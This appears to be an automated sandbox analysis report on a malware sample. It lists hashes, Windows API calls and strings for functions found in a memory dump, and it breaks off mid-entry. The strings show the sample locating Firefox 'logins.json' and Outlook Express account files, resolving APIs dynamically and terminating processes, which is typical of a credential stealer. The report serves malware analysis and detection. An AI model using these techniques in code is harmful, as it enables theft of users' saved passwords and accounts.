Opcode ID: cd5b08a8332cbe835f836832a923c432df9b248f725fb69582a60c811b8d2d90
Instruction ID: 9b4a6e7d6532fc655b618219248bf258c40461d03e34d2f504c244d715019454
Opcode Fuzzy Hash: cd5b08a8332cbe835f836832a923c432df9b248f725fb69582a60c811b8d2d90
Instruction Fuzzy Hash: 5C519071E00205AFCF21EBB8DCC8D5B77E9AB5C2547A58D26A902E3104FB30E919DF24

Uniqueness

Uniqueness Score: -1.00%

Function 05407381, Relevance: 9.1, APIs: 6, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45c6867499593e088d18e9707d3f308743f160e2f151c9e9a734347c0a3f89e4
Instruction ID: cfb7cd71227473f082c122db20382eb47ef7c05f130482d7ebd7c1d921dffe1f
Opcode Fuzzy Hash: 45c6867499593e088d18e9707d3f308743f160e2f151c9e9a734347c0a3f89e4
Instruction Fuzzy Hash: CE41C871510715AFDB709F2998859AB7FA9FB44320B604A3EF56AC22C0DB70A805CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0541D44C, Relevance: 9.1, APIs: 6, Instructions: 104COMMON

Download Yara Rule

APIs

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

memset.NTDLL ref: 0541D497
RtlEnterCriticalSection.NTDLL(?), ref: 0541D50F
RtlLeaveCriticalSection.NTDLL(?), ref: 0541D527
GetLastError.KERNEL32(05407FBD,?,?), ref: 0541D53F
RtlEnterCriticalSection.NTDLL(?), ref: 0541D54B
RtlLeaveCriticalSection.NTDLL(?), ref: 0541D55A

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$AllocateErrorHeapLastmemset
String ID:
API String ID: 2000578454-0
Opcode ID: 26c138736fc50c0e1d1d06ad9e2eb4df044836acc4e355bc25953971b66a565c
Instruction ID: e87d48310744db0786c7c047f90f7a9acf894943480bbf4867b7babf5cb85883
Opcode Fuzzy Hash: 26c138736fc50c0e1d1d06ad9e2eb4df044836acc4e355bc25953971b66a565c
Instruction Fuzzy Hash: FE4169B1900705AFDB20DF69C889BAABBF8FF08744F50852AE959D7280D774A640CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0541D34C, Relevance: 9.1, APIs: 6, Instructions: 91timememoryCOMMON

Download Yara Rule

APIs

OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0541D366
CreateWaitableTimerA.KERNEL32(0542E0E4,00000003,?), ref: 0541D383
GetLastError.KERNEL32(?,?,0541A3CE,?), ref: 0541D394

Part of subcall function 0542207B: RegQueryValueExA.KERNELBASE(00000000,05406702,00000000,05406702,00000000,?,00000000,00000000,00000000,00000001,75144D40,?,?,?,05412103,Ini), ref: 054220B3
Part of subcall function 0542207B: RtlAllocateHeap.NTDLL(00000000,?), ref: 054220C7
Part of subcall function 0542207B: RegQueryValueExA.ADVAPI32(00000000,05406702,00000000,05406702,00000000,?,?,?,?,05412103,Ini,05406702,00000000,00000001,00000000,75144D40), ref: 054220E1
Part of subcall function 0542207B: RegCloseKey.KERNELBASE(00000000,?,?,?,05412103,Ini,05406702,00000000,00000001,00000000,75144D40,?,?,?,05406702,00000000), ref: 0542210B

GetSystemTimeAsFileTime.KERNEL32(?,00000000,0541A3CE,?,?,?,0541A3CE,?), ref: 0541D3D4
SetWaitableTimer.KERNEL32(?,0541A3CE,00000000,00000000,00000000,00000000,?,?,0541A3CE,?), ref: 0541D3F3
HeapFree.KERNEL32(00000000,0541A3CE,00000000,0541A3CE,?,?,?,0541A3CE,?), ref: 0541D409

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
String ID:
API String ID: 1835239314-0
Opcode ID: 49a498870e7cab5a8362162b3a7b8a5f9541cc400ecbacd5717ba7de1e820682
Instruction ID: 441f612160fc942bef2a01374ccd854c3c2ca9ba22fa1e5dd7a1e601410de8a4
Opcode Fuzzy Hash: 49a498870e7cab5a8362162b3a7b8a5f9541cc400ecbacd5717ba7de1e820682
Instruction Fuzzy Hash: DA313CB1D00228FB8B24DF96C989CEFBFB9FB84740B508056F945E6241D730AA40DB75

Uniqueness

Uniqueness Score: -1.00%

Function 054076A8, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

GetModuleHandleA.KERNEL32(4C44544E,00000020,00000000,05425769,?,?,?,?,05425978,?,?,00000000,00000000,00000000), ref: 054076CD
GetProcAddress.KERNEL32(00000000,7243775A), ref: 054076EF
GetProcAddress.KERNEL32(00000000,614D775A), ref: 05407705
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 0540771B
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 05407731
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 05407747

Part of subcall function 0541FFF2: memset.NTDLL ref: 05420073

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 73e2299670e0e6a82b1848c003ed934d34969cb7117c58664e4f527888bcc16b
Instruction ID: 6f6dd80ad1bb459de95df80abe4da7bc7e0bc50fdac13f3b40d16da0ddba61ab
Opcode Fuzzy Hash: 73e2299670e0e6a82b1848c003ed934d34969cb7117c58664e4f527888bcc16b
Instruction Fuzzy Hash: C0214DB560021AAFD760DF69C844EEB7BFCEB08680714416AE809C7260EB70F919CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0542390B, Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,00000102,?,?,?,00000000,00000000), ref: 0542394A
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0542395B
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000), ref: 05423976
GetLastError.KERNEL32 ref: 0542398C
HeapFree.KERNEL32(00000000,?), ref: 0542399E
HeapFree.KERNEL32(00000000,?), ref: 054239B3

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
String ID:
API String ID: 1822509305-0
Opcode ID: 71f92ec11a70dd5a5ad19e36f80d7db8774a52553ce193e6c11fad00d1afa47f
Instruction ID: 56e9c9d6cec6b6613970028d7fe083bf72354c91faae61a90b5585413bbaa2df
Opcode Fuzzy Hash: 71f92ec11a70dd5a5ad19e36f80d7db8774a52553ce193e6c11fad00d1afa47f
Instruction Fuzzy Hash: BB116A76911138BBCB325F96DC09CEFBF7EFF46290B814462F605E2150CA354A51DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 05406AC4, Relevance: 9.1, APIs: 6, Instructions: 67stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000E39,00000000,?), ref: 05406AEC
_strupr.NTDLL ref: 05406B27
lstrlen.KERNEL32(00000000), ref: 05406B2F
TerminateProcess.KERNEL32(00000000,00000000,?,00000000,?), ref: 05406B6F
CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 05406B76
GetLastError.KERNEL32 ref: 05406B7E

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
String ID:
API String ID: 110452925-0
Opcode ID: d2b5473214aaa25472f47e4ae7a5ace6c9975f936f1fcd4e537063fd1116f4b2
Instruction ID: 96887838aa33fc331e88bacc7fa32654bd55877df4fb7057cb678c9d6e6edb44
Opcode Fuzzy Hash: d2b5473214aaa25472f47e4ae7a5ace6c9975f936f1fcd4e537063fd1116f4b2
Instruction Fuzzy Hash: 28119DB2100224AFDB256B719D8DDEF7B7DEB88310B661466BA07D3180EE7488518B61

Uniqueness

Uniqueness Score: -1.00%

Function 05407C72, Relevance: 9.1, APIs: 6, Instructions: 64memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(05404EA1,00000000,00000000,00000008,?,?,05404EA1,054205B3,00000000,?), ref: 05407C88
RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 05407C9B
lstrcpy.KERNEL32(00000008,05404EA1), ref: 05407CBD
GetLastError.KERNEL32(05416DB6,00000000,00000000,?,?,05404EA1,054205B3,00000000,?), ref: 05407CE6
HeapFree.KERNEL32(00000000,00000000,?,?,05404EA1,054205B3,00000000,?), ref: 05407CFE
CloseHandle.KERNEL32(00000000,05416DB6,00000000,00000000,?,?,05404EA1,054205B3,00000000,?), ref: 05407D07

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
String ID:
API String ID: 2860611006-0
Opcode ID: 7456c9144d09ab11ff854403ac647119e152143b3fee15a379f924c8722c3f4b
Instruction ID: e559331a0836fafc0ae0b32dabf93fcf120d2f49a026969d7b9bb3aea0fc529a
Opcode Fuzzy Hash: 7456c9144d09ab11ff854403ac647119e152143b3fee15a379f924c8722c3f4b
Instruction Fuzzy Hash: 1A118E71514329EFDB249F64D8898EFBFB8FB412A0761443AF51AD3280DB30AD12CB65

Uniqueness

Uniqueness Score: -1.00%

Function 05413AFB, Relevance: 9.1, APIs: 6, Instructions: 64libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

LoadLibraryA.KERNEL32(6676736D,00000000,?,00000014,?,05413EAA), ref: 05413B1B
GetProcAddress.KERNEL32(00000000,704F4349), ref: 05413B3A
GetProcAddress.KERNEL32(00000000,6C434349), ref: 05413B4F
GetProcAddress.KERNEL32(00000000,6E494349), ref: 05413B65
GetProcAddress.KERNEL32(00000000,65474349), ref: 05413B7B
GetProcAddress.KERNEL32(00000000,65534349), ref: 05413B91

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: AddressProc$AllocateHeapLibraryLoad
String ID:
API String ID: 2486251641-0
Opcode ID: a969bea867aa6a1e974621151f537210c28dde7c8871d7a98c1338ec7d33009b
Instruction ID: 5c6a8ae3b827c24c41d2c876d0f31877600737a88b1db18a54fcf91e470b6da9
Opcode Fuzzy Hash: a969bea867aa6a1e974621151f537210c28dde7c8871d7a98c1338ec7d33009b
Instruction Fuzzy Hash: 3E11F1B22006265FE720DFA9DD88EE777ECEB546443454966E90DC7212EA30E8168B74

Uniqueness

Uniqueness Score: -1.00%

Function 0540DD4C, Relevance: 9.1, APIs: 6, Instructions: 61stringthreadtimeCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD5E

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD77
GetCurrentThreadId.KERNEL32 ref: 0540DD84
GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD90
GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD9E
lstrcpy.KERNEL32(00000000), ref: 0540DDC0

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
String ID:
API String ID: 1175089793-0
Opcode ID: 955c072090c6c886b840b079e0c4fe9ffd5011840e451147e08a7523f023652d
Instruction ID: a6fb6df206b3843c236f9260ecd37c923d380bc8f11c25395bfde927d80bf128
Opcode Fuzzy Hash: 955c072090c6c886b840b079e0c4fe9ffd5011840e451147e08a7523f023652d
Instruction Fuzzy Hash: F101A572A102356B97215BA69C49EEF3B7CEEC1A40B551066BA06E3240DE70D80687B5

Uniqueness

Uniqueness Score: -1.00%

Function 0541C3BF, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0541C41A
SetLastError.KERNEL32(00000000,?,?,?), ref: 0541C46E

Strings

vids, xrefs: 0541C479

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: ErrorLastmemset
String ID: vids
API String ID: 3276359510-3767230166
Opcode ID: 66a4f3412af7195e87f93c1bfcd3a2ee6058019ed25e5de01d291ed7f481be96
Instruction ID: 2fd0ac6f05b84d1af12359b898867c788c1d0d46468b3cac613cb4bbe5f6a3e7
Opcode Fuzzy Hash: 66a4f3412af7195e87f93c1bfcd3a2ee6058019ed25e5de01d291ed7f481be96
Instruction Fuzzy Hash: 308106B1E40229AFCF20DFA5D9849EEBBB9BF08710F10816BE815E7251D7709A45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 054014DF, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0540158A
FlushFileBuffers.KERNEL32(00000000,?,?,00000050), ref: 054015F1
GetLastError.KERNEL32(?,?,00000050), ref: 054015FB

Strings

P, xrefs: 054015AE
K, xrefs: 054015B2

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: BuffersErrorFileFlushLastmemset
String ID: K$P
API String ID: 3817869962-420285281
Opcode ID: 187c0dfb44b379ac7bd03d8814d9ea2d25f8e901613505afc753d5fae462dfc7
Instruction ID: 06dbfb130665f2b7bd6b0993c2e2ccdee07b39bc345c9103f54f1eab21a286fa
Opcode Fuzzy Hash: 187c0dfb44b379ac7bd03d8814d9ea2d25f8e901613505afc753d5fae462dfc7
Instruction Fuzzy Hash: A7416C70A017059FDB24CFA4CD84AAFBBF5BF44704F68696EE48693680D734E504CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 05411DA7, Relevance: 8.9, APIs: 7, Instructions: 106stringCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,05421056,00000000,?,?,?,05421056,?,?,?,?,?), ref: 05411DE5
lstrlen.KERNEL32(05421056,?,?,?,05421056,?,?,?,?,?), ref: 05411DF7
memcpy.NTDLL(?,?,?,?,?,?,?), ref: 05411E6B
lstrlen.KERNEL32(05421056,00000000,00000000,?,?,?,05421056,?,?,?,?,?), ref: 05411E80
lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 05411E99
memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 05411EA2
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 05411EB0

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: lstrlenmemcpy$FreeLocal
String ID:
API String ID: 1123625124-0
Opcode ID: 42e142b75745e7a5d5a35591f116850e8438bc137052f5a27445382f996721ac
Instruction ID: 284aaf7512ed198763a4befabb694bcddecca22568ab29c231a461988c1a65f0
Opcode Fuzzy Hash: 42e142b75745e7a5d5a35591f116850e8438bc137052f5a27445382f996721ac
Instruction Fuzzy Hash: 1331E6B290022AABDF119F69DD458DF3BA9FF142A0B454066FD1496210EB31DE60CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 0541A5AE, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 05408BBE: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000), ref: 05408BCC

RtlAllocateHeap.NTDLL(00000000,?), ref: 0541A60F
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0541A65E

Part of subcall function 0540976C: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,0540E69C), ref: 054097AD
Part of subcall function 0540976C: GetLastError.KERNEL32 ref: 054097B7
Part of subcall function 0540976C: WaitForSingleObject.KERNEL32(000000C8), ref: 054097DC
Part of subcall function 0540976C: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 054097FD
Part of subcall function 0540976C: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 05409825
Part of subcall function 0540976C: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 0540983A
Part of subcall function 0540976C: SetEndOfFile.KERNEL32(00000006), ref: 05409847
Part of subcall function 0540976C: CloseHandle.KERNEL32(00000006), ref: 0540985F

HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,00000101,?,?,?,0541E34B,?,?,?,?,?,00000000), ref: 0541A693
HeapFree.KERNEL32(00000000,?,?,?,?,0541E34B,?,?,?,?,?,00000000,?,00000000,?,0540564C), ref: 0541A6A3

Strings

https://, xrefs: 0541A5C0

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
String ID: https://
API String ID: 4200334623-4275131719
Opcode ID: b0b2bb140bf6f1ef7dad544d73163291f36e2209c85c2b6558a914b76768b5b5
Instruction ID: ede4954715eb5ae91eea34063a84a5efb0248e1e75e828ebbc59990d134e663c
Opcode Fuzzy Hash: b0b2bb140bf6f1ef7dad544d73163291f36e2209c85c2b6558a914b76768b5b5
Instruction Fuzzy Hash: 07315AB6910129FFDB149FA5DC89CEEBB7DFB08280B600066F505D3150CB71AE51DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 05410963, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 05407049: memcpy.NTDLL(00000000,00000090,?,?,00000000,00000000), ref: 05407085
Part of subcall function 05407049: memset.NTDLL ref: 05407101
Part of subcall function 05407049: memset.NTDLL ref: 05407116

RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 054109B7
lstrcmpi.KERNEL32(00000000,Main), ref: 054109D7
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 05410A1C
HeapFree.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 05410A2D

Strings

Main, xrefs: 054109CF

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$Freememset$Allocatelstrcmpimemcpy
String ID: Main
API String ID: 1065503980-521822810
Opcode ID: bd21695c2a5c2f5bbc63bc415cf115b18c7a5fe62d9a64a0104ffd4d2443114c
Instruction ID: 4f9ec7ca356b027a40aefa3a73755accc4204c7ae22f77c3baea22e8be655ed0
Opcode Fuzzy Hash: bd21695c2a5c2f5bbc63bc415cf115b18c7a5fe62d9a64a0104ffd4d2443114c
Instruction Fuzzy Hash: 47219C71A10219FBDF219FA5EC89EEE7B79FB04384F10806AF905E6160DB30AA45DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0541CEB3, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(NTDLL.DLL,00000001,77A19EB0,00000000,?,?,?,?,00000000,0542383A), ref: 0541CEC4
LoadLibraryA.KERNEL32(NTDSAPI.DLL), ref: 0541CF5E
FreeLibrary.KERNEL32(00000000), ref: 0541CF69

Strings

NTDSAPI.DLL, xrefs: 0541CF57
NTDLL.DLL, xrefs: 0541CEBF

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Library$FreeHandleLoadModule
String ID: NTDLL.DLL$NTDSAPI.DLL
API String ID: 2140536961-3558519346
Opcode ID: 404bf4e23c8b4306de8af6d948f1532dfdd8beeafffad661569eca052e00488a
Instruction ID: 08c518ffcd7d4b321a01a4729dfe66475f9e6ac339e28dcd9500c4b56572fa96
Opcode Fuzzy Hash: 404bf4e23c8b4306de8af6d948f1532dfdd8beeafffad661569eca052e00488a
Instruction Fuzzy Hash: 56315E716443128FDB14CF24C884BABBBE0FB84615F14496EF885C7351E770D949CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0542514A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,75188250,751469A0,?,?,?,05404DE1,?,00000000,?), ref: 0542515A

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,05404DE1,?,00000000,?), ref: 0542517C
lstrcpyW.KERNEL32(00000000,00000000), ref: 054251A8
lstrcatW.KERNEL32(00000000,\logins.json), ref: 054251B4

Part of subcall function 05412CE7: strstr.NTDLL ref: 05412DA2
Part of subcall function 05412CE7: strstr.NTDLL ref: 05412DE7

Strings

\logins.json, xrefs: 054251AE

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
String ID: \logins.json
API String ID: 3712611166-2913861366
Opcode ID: 2eb45f694ecd811fb3d32cd0aaebe8b72fe200a88d60c25e3513e700f931c0a0
Instruction ID: 527b8da439d369b00d19fba30f40df3f6482a5f56e82615c00e1bb3f62f32f41
Opcode Fuzzy Hash: 2eb45f694ecd811fb3d32cd0aaebe8b72fe200a88d60c25e3513e700f931c0a0
Instruction Fuzzy Hash: 27111C72601139BFDB15AFA2CC88DEF7FA9FF05290B50406AF905D6110EB31DA419BA0

Uniqueness

Uniqueness Score: -1.00%

Function 054021FC, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000), ref: 05402210

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

mbstowcs.NTDLL ref: 0540222C
lstrlen.KERNEL32(account{*}.oeaccount), ref: 0540223A
mbstowcs.NTDLL ref: 05402252

Part of subcall function 05415518: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,77A31120), ref: 05415564
Part of subcall function 05415518: lstrlenW.KERNEL32(?,?,77A31120), ref: 05415570
Part of subcall function 05415518: memset.NTDLL ref: 054155B8
Part of subcall function 05415518: FindFirstFileW.KERNEL32(00000000,00000000), ref: 054155D3
Part of subcall function 05415518: lstrlenW.KERNEL32(0000002C), ref: 0541560B
Part of subcall function 05415518: lstrlenW.KERNEL32(?), ref: 05415613
Part of subcall function 05415518: memset.NTDLL ref: 05415636
Part of subcall function 05415518: wcscpy.NTDLL ref: 05415648

Part of subcall function 05408AC2: HeapFree.KERNEL32(00000000,00000000,05421258,00000000), ref: 05408ACE

Strings

account{*}.oeaccount, xrefs: 05402234, 05402239, 05402250

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
String ID: account{*}.oeaccount
API String ID: 1961997177-4234512180
Opcode ID: f531ddcd3da947e15d637a250716d461fac7689604fed6125c5125ff05ef7633
Instruction ID: b2f93dedeeae8287c2f918f946542cd490a0cffb72217e04a2816c0bf12e4469
Opcode Fuzzy Hash: f531ddcd3da947e15d637a250716d461fac7689604fed6125c5125ff05ef7633
Instruction Fuzzy Hash: 23019F76A10218B7DF10A7B6CC4DFCF7FACEB85254F20407BB505E2180D674DA009660

Uniqueness

Uniqueness Score: -1.00%

Function 0541EE2A, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00010000), ref: 0541EE46
lstrlen.KERNEL32(EMPTY,00000008,00000000,0000010E,00000000,?), ref: 0541EE7A
HeapFree.KERNEL32(00000000,00000000,EMPTY,00000000), ref: 0541EE96

Strings

log, xrefs: 0541EE82
EMPTY, xrefs: 0541EE74, 0541EE79, 0541EE81

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen
String ID: EMPTY$log
API String ID: 3886119090-141014656
Opcode ID: b98c67eb083206f662cdb0671c98699c87c32d7a1dd0c13d4431ec9c6d375cdd
Instruction ID: 72b1132518fe7777c900b75dcd40d85f2f6339f830f7e8967c346da9c58a8536
Opcode Fuzzy Hash: b98c67eb083206f662cdb0671c98699c87c32d7a1dd0c13d4431ec9c6d375cdd
Instruction Fuzzy Hash: 8C01F971A10334BBD73156AA9C4DDDF7FBDDB89790B910057F900D2100D6B04D40C6B8

Uniqueness

Uniqueness Score: -1.00%

Function 05422F63, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(0542E240,05410722,?,?,?,?,?,?,?,?,0540202D,?), ref: 05422F67
GetModuleHandleA.KERNEL32(NTDLL.DLL,LdrRegisterDllNotification,?,?,?,?,?,?,?,?,0540202D,?), ref: 05422F7B
GetProcAddress.KERNEL32(00000000), ref: 05422F82

Strings

LdrRegisterDllNotification, xrefs: 05422F71
NTDLL.DLL, xrefs: 05422F76

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID: LdrRegisterDllNotification$NTDLL.DLL
API String ID: 3310240892-3368964806
Opcode ID: 72eec8cb528fb5981589a223c26df156da9c00db64060633eb8316240045a29d
Instruction ID: c9bd50cbd12e6c5f23e0d5e6eb5d92abc4f037532b4f34941a170ee86044dc5f
Opcode Fuzzy Hash: 72eec8cb528fb5981589a223c26df156da9c00db64060633eb8316240045a29d
Instruction Fuzzy Hash: 80016D7464C3319FC7A49F669989FE6BAE9BB05304F96C0ABE449CB254DAB0C041DB24

Uniqueness

Uniqueness Score: -1.00%

Function 05414D61, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48memorystringCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(0542DF60,00000000), ref: 05414D71
RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 05414D8B
lstrcpy.KERNEL32(00000000,-01), ref: 05414DAB
HeapFree.KERNEL32(00000000,00000000,0542DF60,?,00000000,00000000,00000000,?,00000000,05417B1E,00000000,00000000), ref: 05414DCE

Part of subcall function 05403EAE: SetEvent.KERNEL32(?,05414D82,?,00000000,05417B1E,00000000,00000000), ref: 05403EC2
Part of subcall function 05403EAE: WaitForSingleObject.KERNEL32(?,000000FF,0000003C,?,00000000,05417B1E,00000000,00000000), ref: 05403EDC
Part of subcall function 05403EAE: CloseHandle.KERNEL32(?,?,00000000,05417B1E,00000000,00000000), ref: 05403EE5
Part of subcall function 05403EAE: CloseHandle.KERNEL32(?,0000003C,?,00000000,05417B1E,00000000,00000000), ref: 05403EF3
Part of subcall function 05403EAE: RtlEnterCriticalSection.NTDLL(00000008), ref: 05403EFF
Part of subcall function 05403EAE: RtlLeaveCriticalSection.NTDLL(00000008), ref: 05403F28
Part of subcall function 05403EAE: CloseHandle.KERNEL32(?), ref: 05403F44
Part of subcall function 05403EAE: LocalFree.KERNEL32(?), ref: 05403F52
Part of subcall function 05403EAE: RtlDeleteCriticalSection.NTDLL(00000008), ref: 05403F5C

Strings

-01, xrefs: 05414DA3

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
String ID: -01
API String ID: 1103286547-1095514728
Opcode ID: 8ddeded046533d4c95ca9646528ed07c3c32e186252c914bc0ece4081bc7760d
Instruction ID: d327b05d030fb98a4db5b56601aa13130867a4d49a528a3422abb2d552bbd9d5
Opcode Fuzzy Hash: 8ddeded046533d4c95ca9646528ed07c3c32e186252c914bc0ece4081bc7760d
Instruction Fuzzy Hash: A5F0FC72B542387FDB302AA19CCDDFB3F6CE74D2E97920566F604D2140CE254C0196B5

Uniqueness

Uniqueness Score: -1.00%

Function 0541FD0C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45libraryloaderCOMMON

Download Yara Rule

APIs

